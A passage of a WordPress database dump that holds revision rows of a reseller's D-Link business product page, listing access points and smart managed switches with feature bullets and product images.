/>â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:34:54','2019-09-25 06:34:54','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3408,1,'2019-09-25 14:35:44','2019-09-25 06:35:44','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 style=\"text-align: center;\">Enjoy High-performance Wireless Connectivity</h4><p style=\"text-align: left;\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications</p><h4 style=\"text-align: center;\">MU-MIMO with Beamforming</h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network</p><h4 style=\"text-align: center;\">Multiple Operational Modes</h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N300 Wireless PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2330-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>High-speed wireless performance with 300 Mbps wireless signal rates</p><p>Support Wi-fi Multimediaâ„¢ (WMM) for audio, video, and voice applications</p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS/Bridgeanf Client</p><p>Support Inbuilt Radius server, Network Access protection (NAP)</p><p>Equipped with 8 VLANs per band for multiple SSIDsÂ  Implementation</p><p>Support Central WiFi Manager to configure and manage multiple AP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h3>Smart Switch</h3>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12TC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T/SFP+ Combo Slots<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DXS-1210-12SC_A1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 8 Ports 10G SFP+, Two 10 Gigabit Base-T /SFP+ Combo Ports<br />â€¢ Suitable for virtualization, cloud services and server-to-server applications<br />â€¢ D-link Green Technology conserves energy by powering down unused ports<br />â€¢ Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br />â€¢ Support G.8032 ERPS to achieve high reliability and network stability<br />â€¢ 802.1X port based authentication, for authentication through external RADIUS servers<br />â€¢ Support D-Link Network Assistant Utility to simplifies the configuration<br />â€¢ Loopback Detection automatically disables port or VLAN when a loop is detected<br />â€¢ Support IGMP &amp; MLD Snooping and 802.3x Flow Control</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>26-Port Layer 2 Lite Smart Managed Gigabit Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1100-26-front-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Port 10/100/1000 Base-T with 2 Gigabit SFP Ports<br />â€¢ Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>10 Gigabit Ethernet Smart Managed Switches</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1.png 510w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-1-255x300.png 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>10 Gigabit Ethernet Connection</p><p>Improved Power Efficiency</p><p>Smart and Flexible Management</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 2 Smart Managed Gigabit PoE Switch</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T PoE + 4 slots for Gigabit SFP<br />â€¢ Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br />â€¢ Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br />â€¢ Support IEEE 802.1Q VLAN traffic segregation<br />â€¢ Access Control List (ACL) feature to enhances network security<br />â€¢ Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br />â€¢ Loopback detection (LBD) and broadcast storm control to avoid network downtime<br />â€¢ Quality of Service (QOS) and bandwidth control to ensure smooth operation<br />â€¢ Support Web-based GUI, Smart Console , Network Assistance Utility<br />â€¢ Cable diagnostics function to help troubleshooting wiring problem</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DES-1510-52-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 48 Ports 10/100/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Built-in SNMP MIB for remote NetworkÂ Management Systems</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Support IEEE 802.3af (PoE) and 802.3at (PoE+) Â with Power Budget of 370W</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>		\n			<h4>28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink</h4>		\n										<img width=\"510\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600.jpg 510w, https://bintara.com.my/wp-content/uploads/2018/12/DGS-1510-28X-510x600-255x300.jpg 255w\" sizes=\"(max-width: 510px) 100vw, 510px\" />											\n		<p>â€¢ 24 Ports 10/100/1000 Base-T PoE + 4 x 10G SFP+ Slots</p><p>â€¢Â Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device</p><p>â€¢Â Virtual stacking of up to 32 units via D-linkâ€™sÂ Single IPÂ Management (SIM)</p><p>â€¢Â Support G.8032 ERPS to achieve high reliability Â and network stability</p><p>â€¢Â Auto Surveillance (ASV), Auto VoiceÂ VLAN for VoIP and Video Surveillance deployments.</p><p>â€¢Â 802.1X port basedÂ authentication, for authentication throughÂ external RADIUS servers</p><p>â€¢Â IEEE 802.3az Energy Efficient Ethernet with Â D-Link Green 3.0 power-saving features</p><p>â€¢Â Loopback Detection automatically disables port or VLAN when a loop is detected</p><p>â€¢Â SupportÂ Layer 2 Features â€“Â IGMP &amp; MLD Snooping, 802.3x Â Flow control Â and LLDP</p><p>[maxbutton id=\"6\" ]Â </p>','D-Link','','inherit','closed','closed','','1480-revision-v1','','','2019-09-25 14:35:44','2019-09-25 06:35:44','',1480,'https://bintara.com.my/blog/2019/09/25/1480-revision-v1/',0,'revision','',0),(3416,1,'2019-09-25 15:06:43','2019-09-25 07:06:43','<h2>D - Link Business Solution Product </h2>		\n			<h3>Business Wireless</h3>		\n			<h4>AC1750 Wave 2 Dualâ€‘Band WI-FI PoE Access Pointâ€‹</h4>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/dap-2680-features3.png 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<p>Â 802.11ac Wave 2 wireless, up to 1.75 Gbps</p><p>MU-MIMO with beamforming</p><p>Band steering</p><p>Gigabit PoE-capable LAN port</p><p>AP Array utility support</p><p>Free D-Link Central WiFiManager</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>2.4GHz Wireless N300 Outdoor Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/dap-3310-front-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through</p><p>Two 10/100 Ethernet ports (one supporting PoE) allow for further physical expansion</p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage</p><p>Weather-proof design (IPX6) built to withstand harsh environments</p><p>Supports multiple operation modes â€“ AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater</p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic</p><p>Provides WLAN partitioning for deployments such as wireless hot spots</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1750 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage1-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards</p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 MbpsÂ  Over 5 GHz band</p><p>Support load balancing to ensure maximum performance by limiting userÂ  per AP</p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications</p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHzÂ  or 5 GHz band</p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet</p><p>Support multiple operation â€“ AP, WDS with AP, WDS/Bridge and Client</p><p>RuggedÂ  metal housing &amp;Â  Plenum-rated chassis</p><p>Built in Radius ServerÂ  allowing users to create their accounts within the device itself.</p><center>[maxbutton id=\"6\" ]</center>		\n			<h4>N600 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600-255x300.png 255w, https://bintara.com.my/wp-content/uploads/2018/12/ProductMainImage-510x600.png 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		802.11ac Wave 2 wireless, up to 1.75 Gbps\nMU-MIMO with beamforming\nBand steering\nGigabit PoE-capable LAN port\nAP Array utility support\nFree D-Link Central WiFiManager<center>[maxbutton id=\"6\" ]</center>		\n			<h4>AC1300 Wireless Dual-Band PoE Access Pointâ€‹</h4>		\n										<img width=\"255\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600-255x300.jpg 255w, https://bintara.com.my/wp-content/uploads/2018/12/DAP-2610-featured-510x600.jpg 510w\" sizes=\"(max-width: 255px) 100vw, 255px\" />											\n		<h4 